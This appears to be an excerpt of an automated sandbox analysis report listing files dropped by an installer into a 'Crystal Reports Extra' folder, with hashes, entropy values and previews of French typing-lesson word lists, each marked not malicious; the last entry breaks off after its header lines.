                                                          Preview: <script title="Test Lesson" bgcolor="#3f4f1f">..<page title="Introduction to Example Lesson">...<text align="center">Les mois de l'ann.e</text>...<text align="center"> </text>...<text align="center"> </text>...<text align="center" y="300"> PRESS SPACE TO START THE LESSON!</text>...<waitforinput/>..</page>..<page title="The a Key" bgcolor="#3f7f3f">...<img src="/keyboard/keyboard-us.png" x="45" y="220"/>...<text align="center">Les mois de l'ann.e</text>...<text align="center">To start practicing hit the p key</text>...<text color="#000000" x="100" y="273">A</text>...<text color="#000000" x="130" y="273">S</text>...<waitforchar/>...<prac>janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre janvier f.vrier mars avril mai juin juillet ao.t septembre octobre novembre d.cembre</prac>..</page>.. HACK: there is some undesired behavior in scripting.c, this fixes it
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):29
                                                          Entropy (8bit):4.073329701949522
                                                          Encrypted:false
                                                          SSDEEP:3:U96EFjrY+t:UYEFV
                                                          MD5:4C5EF6C036E9E5D3D858F64F08A0E3BD
                                                          SHA1:2622BA2140891F0DBA0D79486F098CE998389CD5
                                                          SHA-256:4A3B872870116053BC40A3D552D6113EAA3C050A2D0856B0C2F86B879E0CF153
                                                          SHA-512:CD87F5684FA899C429220FCCDBF0C58A353A02C0E8131443D1A3C916FD609365D3CD16724FC9CC510568C0760EAAAA21AB6305D982C9E5F546225DFD2A91D7E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_locale_name=fr_FR.utf8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\fingers.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):184
                                                          Entropy (8bit):4.5354514912335295
                                                          Encrypted:false
                                                          SSDEEP:3:YVMG7gdyd5fq8HfuBawwnaozyQlwgqvi45kgK4mKCqjuN1XxujUj/ov:YVTr5bmBaja3gD4qdq6N1XxujNv
                                                          MD5:54F52456338C263B32636AA9EC295678
                                                          SHA1:0C8B9E5B3E003EC12ACE1917503B25B80ED0900E
                                                          SHA-256:7907B6DED9DB9E28883ECF76CCA4FDD3820702CEBE8F49551176AA7C04307489
                                                          SHA-512:7D3DA19D2E00AE2CF729F53A1E01E6B2B3C046CD265B1573163F0DE374915207E0155B3151C1DB24914E47E93754BD707490F6076952521DFDE34D5D5F74C017
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Exercices de doigts..FTC..TFC..QSFD..SQFD..JKL..KIKIKIKIUJUJUJ..ZSX..SXZ..DEC..DCE..ECD..UIOP..POIU..HYN..NHY..NYH..GTB..BGT..VCXW..WXCV..FVR..RFV..FVR..SZX..ZXS..JUIKKI..RFRFVFVFRFV..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-2KL3R.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):273
                                                          Entropy (8bit):4.193105415178804
                                                          Encrypted:false
                                                          SSDEEP:6:xIc4Tp4d2ez/8sCYBBSvAHRVB8+2qg2QZ9smhRv:+Tp4d2eL9CcwA9891SmhRv
                                                          MD5:A2DF62904CF38D31BE1927AD30AAB330
                                                          SHA1:3ECD8A0E4A5C01C02A9D6D8802C7DCD96DB8A9EB
                                                          SHA-256:18DB547C7F295223A8C9C5074BDB9BA8C5059311E4FC468BBC237C9F20477D51
                                                          SHA-512:E1E5B545F65EAACE0CEBA2B276EFEFEF7A87A38A6111926C22EF2A170D087C86323CC88654B04EF83EA0ACC029B2C563701BF07321D5565B2A7DE7F5EDC6622B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Pr.noms..DOMINIQUE..CECILE..JULIE..MORGANE..ELISABETH..LUCAS..ERIC..VINCENT..VALERIE..THIERRY..FLORE..INES..LAURENT..FABIENNE..MARGOT..AMELIE..GAELLE..CHRISTOPHE..NATHALIE..JUDITH..VICTOR..CLAUDE..MADELEINE..JEAN-PIERRE..JOEL..ISABELLE..ALINE..BABETTE..CAMILLE..APOLLINE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-50OKR.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):106
                                                          Entropy (8bit):4.5086350663682255
                                                          Encrypted:false
                                                          SSDEEP:3:MK4rSZ6FGbIwksJ7xpevkRkcqdG3QcQZt3q:L4qUKJ7xpwCxAgQc06
                                                          MD5:E708F0600D08742D2857896FE9D7733A
                                                          SHA1:98C08FA4FE2615FAD0FFA0C99AF0D52A053207EC
                                                          SHA-256:D398AF298C3B5841D5A7ABE3FB9B93DDB320984B5439AF29EADBF167B3B709A1
                                                          SHA-512:6BB468CBA72C7F85DA6D5762B788A2F713F2F4D6364CF79072F0C0DF0475C267D1DCB001075A4AE9641436B69ED6827D0FC39B3364264082CA041004D3803725
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les mois de l'ann.e.JANVIER.FEVRIER.MARS.AVRIL.MAI.JUIN.JUILLET.AOUT.SEPTEMBRE.OCTOBRE.NOVEMBRE.DECEMBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-5TEU9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):184
                                                          Entropy (8bit):4.5354514912335295
                                                          Encrypted:false
                                                          SSDEEP:3:YVMG7gdyd5fq8HfuBawwnaozyQlwgqvi45kgK4mKCqjuN1XxujUj/ov:YVTr5bmBaja3gD4qdq6N1XxujNv
                                                          MD5:54F52456338C263B32636AA9EC295678
                                                          SHA1:0C8B9E5B3E003EC12ACE1917503B25B80ED0900E
                                                          SHA-256:7907B6DED9DB9E28883ECF76CCA4FDD3820702CEBE8F49551176AA7C04307489
                                                          SHA-512:7D3DA19D2E00AE2CF729F53A1E01E6B2B3C046CD265B1573163F0DE374915207E0155B3151C1DB24914E47E93754BD707490F6076952521DFDE34D5D5F74C017
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Exercices de doigts..FTC..TFC..QSFD..SQFD..JKL..KIKIKIKIUJUJUJ..ZSX..SXZ..DEC..DCE..ECD..UIOP..POIU..HYN..NHY..NYH..GTB..BGT..VCXW..WXCV..FVR..RFV..FVR..SZX..ZXS..JUIKKI..RFRFVFVFRFV..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-ACULO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):806
                                                          Entropy (8bit):4.0959883491003355
                                                          Encrypted:false
                                                          SSDEEP:24:K+M3LaZBzeze7CdgiwObaBKWNht3t9x8Vfx:KhEJeze7auOba3jOfx
                                                          MD5:CEFE2FBB3B99BDDA4ABEA03C407685AA
                                                          SHA1:20EB7DBB809F27BF3C477F546250D642D3320C8C
                                                          SHA-256:C3A4438B54217981191000FC79E36FAC02D9AB99A0E0B151D0892BD163A0FE8F
                                                          SHA-512:9BF4873A5D4C83E51905D080FCC7426203D59C34ACEDD3B21C0D45542135BA7313FC667470473CF0B5CE3C1B9E9BC46B513E8092DC138CF0529FB01DE5C94A97
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (L.Z).LAINE.LAMES.LAPIN.LARGE.LEGER.LEVER.LIONS.LIVRE.LIVRE.LOUPS.LUTIN.MAGIE.MAIRE.MAJOR.MANGE.MANGE.MANGE.MATIN.METAL.MICRO.MIEUX.MIMER.MODES.MOINS.MOLLE.NAGER.NEIGE.NINJA.NOYAU.NUAGE.NUITS.OBJET.ODEUR.OGRES.OMBRE.ORAGE.ORDRE.OUTIL.PAIRE.PANDA.PANNE.PARTI.PASSE.PATTE.PAYER.PEINE.PEPIN.PERLE.PERLE.PETIT.PIANO.PIONS.PLATE.PLEIN.PLEUR.PORTS.POSER.POSER.POULE.PROIE.PUNIR.QUAND.RADIS.RADJA.RATER.RAYON.REINE.REJET.RENNE.RESTE.REVER.RICHE.ROBOT.RUBAN.RUBIS.RUINE.SABOT.SALIR.SAPIN.SELLE.SENTI.SEULE.SIGNE.SINGE.SIROP.SORTE.SOUCI.SPORT.SUCER.SUITE.SUJET.TABAC.TACHE.TANTE.TARTE.TENIR.TERRE.TISSU.TISSU.TITRE.TOMBE.TORDU.TOURS.TRAIN.TRAIT.TRIER.TRONC.TUBES.TUILE.USINE.UTILE.VACHE.VAGUE.VENDU.VENTS.VERRE.VERRE.VERRE.VERSE.VERTE.VIDES.VIGNE.VILLE.VILLE.VIVRE.VOILE.VOILE.VRAIE.WAGON.ZEBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-FF765.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76
                                                          Entropy (8bit):4.392196428711253
                                                          Encrypted:false
                                                          SSDEEP:3:BisJ2yrEB9kAizu3lv277Fe:BFZrEoLu3lu7w
                                                          MD5:D2487BD9C1D8AA304BE56EB78DA5E3E6
                                                          SHA1:4731803748944748EE610BAC2F61935DDF9AA995
                                                          SHA-256:34F468B3E540A381E7B711D58E6FD36AEF209D6D9B5D0F0B724E42863F651483
                                                          SHA-512:A1825B81976766A545716CA40D33EFBC4F62882342C4E18759CB874A0D28067697CEEA3B39CB4B252F05648E83B7E68E3744F23B7083B624FC0C03BDFA99ABD5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les jours de la semaine.LUNDI.MARDI.MERCREDI.JEUDI.VENDREDI.SAMEDI.DIMANCHI
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-NNIAL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):958
                                                          Entropy (8bit):4.2016620883442695
                                                          Encrypted:false
                                                          SSDEEP:24:VpkEkEzy05dAX5SMwg7kZkb6QwFj1v6wCrs9rIL69:Vq6PdY5kSbbL8jF6R4dIG
                                                          MD5:797D991059542589EA4655CB1E3C74F4
                                                          SHA1:E3192B37AF97C8765EF9ACAE631CD8039277B5DD
                                                          SHA-256:8E6457A134E81BB285A46CC0EBEADF0603CF6DEA75A08D226EA129F5C168471A
                                                          SHA-512:1F5ED45929768DB7CB3BBF6091F11F5E24F4493059763BCFD8C8692EEC272DEAB6DF3191B222F30E63DD69C8A7ADC1A8439B0028CF7C34C95BF57A0D910F92F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 4 lettres.ABRI.AIDE.AILE.ANES.ANGE.ARCS.AZUR.BALS.BATI.BAVE.BEAU.BECS.BOAS.BOND.BORD.BOUE.BOUT.BOXE.BRIN.BUTS.CAGE.CAKE.CAMP.CAPE.CASE.CAVE.CERF.CEUX.CHAT.CHEF.CHOU.CIEL.CILS.CINQ.COIN.COLS.COQS.COTE.COUP.CRIS.CROC.CUBE.CUIR.DAME.DATE.DENT.DIEU.DINE.DUES.DURE.EAUX.EURO.FACE.FAIM.FAIM.FANE.FAUX.FILE.FILS.FINE.FIXE.FOIN.FOUS.GANT.GARE.GENS.GOUT.GRUE.HAIE.HAUT.HIER.HOUX.HUIT.INOX.JETS.JOIE.JOIE.JOUR.KART.KIWI.LADY.LAIT.LAME.LION.LIRE.LOIN.LOIS.LOUP.LUNE.LUXE.MALE.MAMY.MARE.MARI.MAUX.MENU.MERS.MIDI.MIEL.MINE.MIRE.MODE.MOKA.MOTS.MURS.NAGE.NEUF.NIDS.NOIX.NOTE.NUIT.OEIL.OEUF.OGRE.ONZE.OSER.OURS.PAGE.PAIN.PAIX.PALE.PAYE.PAYS.PIED.PILE.PION.PIRE.PLIE.PONT.PORT.POUX.PRIX.PURE.QUAI.QUEL.QUOI.RANG.RATE.RIXE.ROND.ROSE.ROUE.SALI.SANG.SAUF.SECS.SELS.SENS.SOIR.SOLS.SONS.SOUS.SUCE.SUIT.TAIT.TARD.TAUX.TAXE.TENU.TIGE.TOIT.TOUR.TOUT.TRIE.TROP.TROU.TRUC.TUBE.USER.VEAU.VENT.VENU.VERS.VIDE.VINS.VITE.VOIE.VOIR.VOIX.VOLS.VUES.YACK.ZERO.ZEST.ZINC.ZIZI.ZOOM.ZOOS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-OSARV.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):728
                                                          Entropy (8bit):4.263967230362317
                                                          Encrypted:false
                                                          SSDEEP:12:KCId1iRorTyw2DJM/x4cwopjo8qeA79Ch3gdUIvLZ0aCkQIlVLDruY21mn:K8R2b2D0qcbpn+9C/KLrC7+VL3qgn
                                                          MD5:848587AF617B126953AEBBEFA0EBDDFE
                                                          SHA1:9347DDD496BE7ABBEE9CF33824B54AA2F02344B2
                                                          SHA-256:5527F932886EE6EF4C5547C57BDA8E8DEB7E756C8A32C90F7644FC51181B8E43
                                                          SHA-512:3D6825979ABC2849BFEC1F4435B7FAFEC6EB716F996F4676EB16F2F61CFA1BA56BEC58D5F9A7B2E44A6CE405860783FAC2EF09E1C87FB13D632DED2C472F2E47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (A.K).ACIDE.AIDER.AIGLE.AILES.AIMER.AJONC.AJOUR.AJOUT.BANJO.BATTU.BICHE.BIJOU.BILLE.BISON.BOIRE.BOITE.BOSSE.BRUTE.BULLE.CAJOU.CARTE.CAVES.CAVES.CERFS.CHANT.CHATS.CHAUD.CHIEN.CHOUX.COING.COLLE.CYGNE.DENTS.DITES.DOIGT.DOJOS.DOUCE.DROIT.ECOLE.ECRIT.ENCRE.ENFUI.ENJEU.EPAIS.EPINE.FAUTE.FEMME.FILET.FILLE.FJORD.FLEUR.FOLLE.FONDS.FRANC.FRANC.FROID.FROID.FRUIT.GAGNE.GLACE.GLACE.GLASP.GOMME.GORGE.GOUTS.GRAIN.GRAND.GRAVE.HAIES.HANTE.HAUTE.HAUTE.HEURE.HIBOU.HOMME.IDEES.IGLOO.ILETS.IMAGE.IVRES.JABLE.JABOT.JACKS.JACOT.JADES.JADIS.JALON.JAMBE.JANTE.JAPON.JARDS.JASER.JAUGE.JAUNE.JAVEL.JEANS.JETON.JEUDI.JEUNE.JOIES.JOIES.JOINT.JOKER.JOLIE.JONCS.JOUET.JOUGS.JOURS.JOYAU.JUDOS.JUGER.JULIE.JUPES.JUPON.JURER.JUSTE.KOALA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\is-Q6S61.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):818
                                                          Entropy (8bit):4.155225190361446
                                                          Encrypted:false
                                                          SSDEEP:12:4IGwz4cln2Fr1Nn4gmJe3f3KBlo5pkwCAxRsvk/MVw1XYJzBGKYQ/CMWmwxpeF60:4az4clnA4g73f3KQH+yKeYJFGKY3VXTG
                                                          MD5:948B6D1C989F99DC0140E33683C2D8D5
                                                          SHA1:5D74A0948818555F0A273CAF53A0E2AF6FAC99DC
                                                          SHA-256:CF5339D67770E9992E34400DD9C3801D7276999A28DB545C2981CD57F3FF694A
                                                          SHA-512:AC0A30E9CE4DC4A0D987CE497858EF11207EB7C702D342B3E2ED0B972E4A7296F54BF168C62C212D6BF988653685798D3C5D0380E859ED6D04393F26DFA550A9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 3 lettres.AIE.AIL.AIR.AMI.ARA.ARC.ARE.ART.AUX.AXE.BAC.BAL.BAS.BEC.BIP.BIS.BOA.BOF.BOL.BON.BUS.BYE.CAP.CAR.CAS.CEP.CES.CET.CIL.COL.COQ.COR.COU.CRI.CRU.DES.DIS.DIT.DIX.DON.DOS.DUC.DUO.DUR.EAU.EST.EUH.EUX.FAC.FAN.FAX.FER.FEU.FIL.FIN.FOC.FOI.FOU.FOX.GAG.GAI.GAZ.GEL.GLU.GUI.GUS.GYM.HEP.HEU.HIC.HIT.HOP.HOU.HUE.HUM.ICI.ILS.ION.IRE.JAR.JET.JEU.JOB.JUS.KAN.KID.KIF.KIR.KIT.KSI.LAC.LAS.LES.LIE.LIN.LIT.LOI.LOT.LUI.LYS.MAI.MAL.MAS.MAT.MAX.MEC.MER.MES.MET.MIE.MIL.MIS.MOI.MON.MOT.MOU.MUR.NEF.NEM.NET.NEZ.NID.NOM.NON.NOS.NUE.NUL.NUS.ODE.OIE.OUF.OUI.OUT.PAF.PAN.PAR.PAS.PET.PEU.PHI.PIC.PIE.PIF.PIN.PIS.PLI.POT.POU.PSY.QUE.QUI.RAI.RAS.RAT.RAZ.REG.RHO.RIF.RIZ.ROC.ROI.RUE.SAC.SEC.SEL.SIX.SKI.SOC.SOL.SON.SOT.SUD.TAU.TEL.TER.TES.TIR.TOC.TOI.TOM.TON.TOP.TRI.UNE.UNI.VAL.VAN.VER.VIE.VIN.VOL.VOS.VUE.WEB.YAK.YEN.ZEF.ZEN.ZOO.ZUT.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\months.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):106
                                                          Entropy (8bit):4.5086350663682255
                                                          Encrypted:false
                                                          SSDEEP:3:MK4rSZ6FGbIwksJ7xpevkRkcqdG3QcQZt3q:L4qUKJ7xpwCxAgQc06
                                                          MD5:E708F0600D08742D2857896FE9D7733A
                                                          SHA1:98C08FA4FE2615FAD0FFA0C99AF0D52A053207EC
                                                          SHA-256:D398AF298C3B5841D5A7ABE3FB9B93DDB320984B5439AF29EADBF167B3B709A1
                                                          SHA-512:6BB468CBA72C7F85DA6D5762B788A2F713F2F4D6364CF79072F0C0DF0475C267D1DCB001075A4AE9641436B69ED6827D0FC39B3364264082CA041004D3803725
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les mois de l'ann.e.JANVIER.FEVRIER.MARS.AVRIL.MAI.JUIN.JUILLET.AOUT.SEPTEMBRE.OCTOBRE.NOVEMBRE.DECEMBRE.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\names.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):273
                                                          Entropy (8bit):4.193105415178804
                                                          Encrypted:false
                                                          SSDEEP:6:xIc4Tp4d2ez/8sCYBBSvAHRVB8+2qg2QZ9smhRv:+Tp4d2eL9CcwA9891SmhRv
                                                          MD5:A2DF62904CF38D31BE1927AD30AAB330
                                                          SHA1:3ECD8A0E4A5C01C02A9D6D8802C7DCD96DB8A9EB
                                                          SHA-256:18DB547C7F295223A8C9C5074BDB9BA8C5059311E4FC468BBC237C9F20477D51
                                                          SHA-512:E1E5B545F65EAACE0CEBA2B276EFEFEF7A87A38A6111926C22EF2A170D087C86323CC88654B04EF83EA0ACC029B2C563701BF07321D5565B2A7DE7F5EDC6622B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Pr.noms..DOMINIQUE..CECILE..JULIE..MORGANE..ELISABETH..LUCAS..ERIC..VINCENT..VALERIE..THIERRY..FLORE..INES..LAURENT..FABIENNE..MARGOT..AMELIE..GAELLE..CHRISTOPHE..NATHALIE..JUDITH..VICTOR..CLAUDE..MADELEINE..JEAN-PIERRE..JOEL..ISABELLE..ALINE..BABETTE..CAMILLE..APOLLINE..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\weekdays.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76
                                                          Entropy (8bit):4.392196428711253
                                                          Encrypted:false
                                                          SSDEEP:3:BisJ2yrEB9kAizu3lv277Fe:BFZrEoLu3lu7w
                                                          MD5:D2487BD9C1D8AA304BE56EB78DA5E3E6
                                                          SHA1:4731803748944748EE610BAC2F61935DDF9AA995
                                                          SHA-256:34F468B3E540A381E7B711D58E6FD36AEF209D6D9B5D0F0B724E42863F651483
                                                          SHA-512:A1825B81976766A545716CA40D33EFBC4F62882342C4E18759CB874A0D28067697CEEA3B39CB4B252F05648E83B7E68E3744F23B7083B624FC0C03BDFA99ABD5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Les jours de la semaine.LUNDI.MARDI.MERCREDI.JEUDI.VENDREDI.SAMEDI.DIMANCHI
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words1.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):818
                                                          Entropy (8bit):4.155225190361446
                                                          Encrypted:false
                                                          SSDEEP:12:4IGwz4cln2Fr1Nn4gmJe3f3KBlo5pkwCAxRsvk/MVw1XYJzBGKYQ/CMWmwxpeF60:4az4clnA4g73f3KQH+yKeYJFGKY3VXTG
                                                          MD5:948B6D1C989F99DC0140E33683C2D8D5
                                                          SHA1:5D74A0948818555F0A273CAF53A0E2AF6FAC99DC
                                                          SHA-256:CF5339D67770E9992E34400DD9C3801D7276999A28DB545C2981CD57F3FF694A
                                                          SHA-512:AC0A30E9CE4DC4A0D987CE497858EF11207EB7C702D342B3E2ED0B972E4A7296F54BF168C62C212D6BF988653685798D3C5D0380E859ED6D04393F26DFA550A9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 3 lettres.AIE.AIL.AIR.AMI.ARA.ARC.ARE.ART.AUX.AXE.BAC.BAL.BAS.BEC.BIP.BIS.BOA.BOF.BOL.BON.BUS.BYE.CAP.CAR.CAS.CEP.CES.CET.CIL.COL.COQ.COR.COU.CRI.CRU.DES.DIS.DIT.DIX.DON.DOS.DUC.DUO.DUR.EAU.EST.EUH.EUX.FAC.FAN.FAX.FER.FEU.FIL.FIN.FOC.FOI.FOU.FOX.GAG.GAI.GAZ.GEL.GLU.GUI.GUS.GYM.HEP.HEU.HIC.HIT.HOP.HOU.HUE.HUM.ICI.ILS.ION.IRE.JAR.JET.JEU.JOB.JUS.KAN.KID.KIF.KIR.KIT.KSI.LAC.LAS.LES.LIE.LIN.LIT.LOI.LOT.LUI.LYS.MAI.MAL.MAS.MAT.MAX.MEC.MER.MES.MET.MIE.MIL.MIS.MOI.MON.MOT.MOU.MUR.NEF.NEM.NET.NEZ.NID.NOM.NON.NOS.NUE.NUL.NUS.ODE.OIE.OUF.OUI.OUT.PAF.PAN.PAR.PAS.PET.PEU.PHI.PIC.PIE.PIF.PIN.PIS.PLI.POT.POU.PSY.QUE.QUI.RAI.RAS.RAT.RAZ.REG.RHO.RIF.RIZ.ROC.ROI.RUE.SAC.SEC.SEL.SIX.SKI.SOC.SOL.SON.SOT.SUD.TAU.TEL.TER.TES.TIR.TOC.TOI.TOM.TON.TOP.TRI.UNE.UNI.VAL.VAN.VER.VIE.VIN.VOL.VOS.VUE.WEB.YAK.YEN.ZEF.ZEN.ZOO.ZUT.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):958
                                                          Entropy (8bit):4.2016620883442695
                                                          Encrypted:false
                                                          SSDEEP:24:VpkEkEzy05dAX5SMwg7kZkb6QwFj1v6wCrs9rIL69:Vq6PdY5kSbbL8jF6R4dIG
                                                          MD5:797D991059542589EA4655CB1E3C74F4
                                                          SHA1:E3192B37AF97C8765EF9ACAE631CD8039277B5DD
                                                          SHA-256:8E6457A134E81BB285A46CC0EBEADF0603CF6DEA75A08D226EA129F5C168471A
                                                          SHA-512:1F5ED45929768DB7CB3BBF6091F11F5E24F4493059763BCFD8C8692EEC272DEAB6DF3191B222F30E63DD69C8A7ADC1A8439B0028CF7C34C95BF57A0D910F92F0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 4 lettres.ABRI.AIDE.AILE.ANES.ANGE.ARCS.AZUR.BALS.BATI.BAVE.BEAU.BECS.BOAS.BOND.BORD.BOUE.BOUT.BOXE.BRIN.BUTS.CAGE.CAKE.CAMP.CAPE.CASE.CAVE.CERF.CEUX.CHAT.CHEF.CHOU.CIEL.CILS.CINQ.COIN.COLS.COQS.COTE.COUP.CRIS.CROC.CUBE.CUIR.DAME.DATE.DENT.DIEU.DINE.DUES.DURE.EAUX.EURO.FACE.FAIM.FAIM.FANE.FAUX.FILE.FILS.FINE.FIXE.FOIN.FOUS.GANT.GARE.GENS.GOUT.GRUE.HAIE.HAUT.HIER.HOUX.HUIT.INOX.JETS.JOIE.JOIE.JOUR.KART.KIWI.LADY.LAIT.LAME.LION.LIRE.LOIN.LOIS.LOUP.LUNE.LUXE.MALE.MAMY.MARE.MARI.MAUX.MENU.MERS.MIDI.MIEL.MINE.MIRE.MODE.MOKA.MOTS.MURS.NAGE.NEUF.NIDS.NOIX.NOTE.NUIT.OEIL.OEUF.OGRE.ONZE.OSER.OURS.PAGE.PAIN.PAIX.PALE.PAYE.PAYS.PIED.PILE.PION.PIRE.PLIE.PONT.PORT.POUX.PRIX.PURE.QUAI.QUEL.QUOI.RANG.RATE.RIXE.ROND.ROSE.ROUE.SALI.SANG.SAUF.SECS.SELS.SENS.SOIR.SOLS.SONS.SOUS.SUCE.SUIT.TAIT.TARD.TAUX.TAXE.TENU.TIGE.TOIT.TOUR.TOUT.TRIE.TROP.TROU.TRUC.TUBE.USER.VEAU.VENT.VENU.VERS.VIDE.VINS.VITE.VOIE.VOIR.VOIX.VOLS.VUES.YACK.ZERO.ZEST.ZINC.ZIZI.ZOOM.ZOOS.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):728
                                                          Entropy (8bit):4.263967230362317
                                                          Encrypted:false
                                                          SSDEEP:12:KCId1iRorTyw2DJM/x4cwopjo8qeA79Ch3gdUIvLZ0aCkQIlVLDruY21mn:K8R2b2D0qcbpn+9C/KLrC7+VL3qgn
                                                          MD5:848587AF617B126953AEBBEFA0EBDDFE
                                                          SHA1:9347DDD496BE7ABBEE9CF33824B54AA2F02344B2
                                                          SHA-256:5527F932886EE6EF4C5547C57BDA8E8DEB7E756C8A32C90F7644FC51181B8E43
                                                          SHA-512:3D6825979ABC2849BFEC1F4435B7FAFEC6EB716F996F4676EB16F2F61CFA1BA56BEC58D5F9A7B2E44A6CE405860783FAC2EF09E1C87FB13D632DED2C472F2E47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Mots de 5 lettres (A.K).ACIDE.AIDER.AIGLE.AILES.AIMER.AJONC.AJOUR.AJOUT.BANJO.BATTU.BICHE.BIJOU.BILLE.BISON.BOIRE.BOITE.BOSSE.BRUTE.BULLE.CAJOU.CARTE.CAVES.CAVES.CERFS.CHANT.CHATS.CHAUD.CHIEN.CHOUX.COING.COLLE.CYGNE.DENTS.DITES.DOIGT.DOJOS.DOUCE.DROIT.ECOLE.ECRIT.ENCRE.ENFUI.ENJEU.EPAIS.EPINE.FAUTE.FEMME.FILET.FILLE.FJORD.FLEUR.FOLLE.FONDS.FRANC.FRANC.FROID.FROID.FRUIT.GAGNE.GLACE.GLACE.GLASP.GOMME.GORGE.GOUTS.GRAIN.GRAND.GRAVE.HAIES.HANTE.HAUTE.HAUTE.HEURE.HIBOU.HOMME.IDEES.IGLOO.ILETS.IMAGE.IVRES.JABLE.JABOT.JACKS.JACOT.JADES.JADIS.JALON.JAMBE.JANTE.JAPON.JARDS.JASER.JAUGE.JAUNE.JAVEL.JEANS.JETON.JEUDI.JEUNE.JOIES.JOIES.JOINT.JOKER.JOLIE.JONCS.JOUET.JOUGS.JOURS.JOYAU.JUDOS.JUGER.JULIE.JUPES.JUPON.JURER.JUSTE.KOALA.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\french\words\words4.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
